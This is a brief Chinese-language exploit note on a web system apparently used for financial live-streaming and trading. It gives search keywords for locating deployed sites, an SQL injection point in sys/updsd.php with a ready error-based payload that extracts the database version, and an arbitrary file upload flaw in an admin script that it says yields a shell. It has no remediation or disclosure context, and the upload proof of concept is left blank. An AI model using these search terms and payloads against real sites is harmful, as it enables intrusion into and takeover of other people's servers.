1、网站搜索关键词:
牛昆财经直播系统
牛昆喊单直播系统
牛昆微交易系统开发
2、sql注入漏洞
下载源代码进行分析,对站点进行本地搭建,测试sql注入点如下:
位置: sys\updsd.php
参数: $_GET['id']
sql注入POC: ?id=1 or updatexml(0,concat(0x7c,version()),1)
3、任意文件上传漏洞
位置: admin\am_jiaren_exls.php
参数: $_FILES['file_stu']
POC:
直接getshell。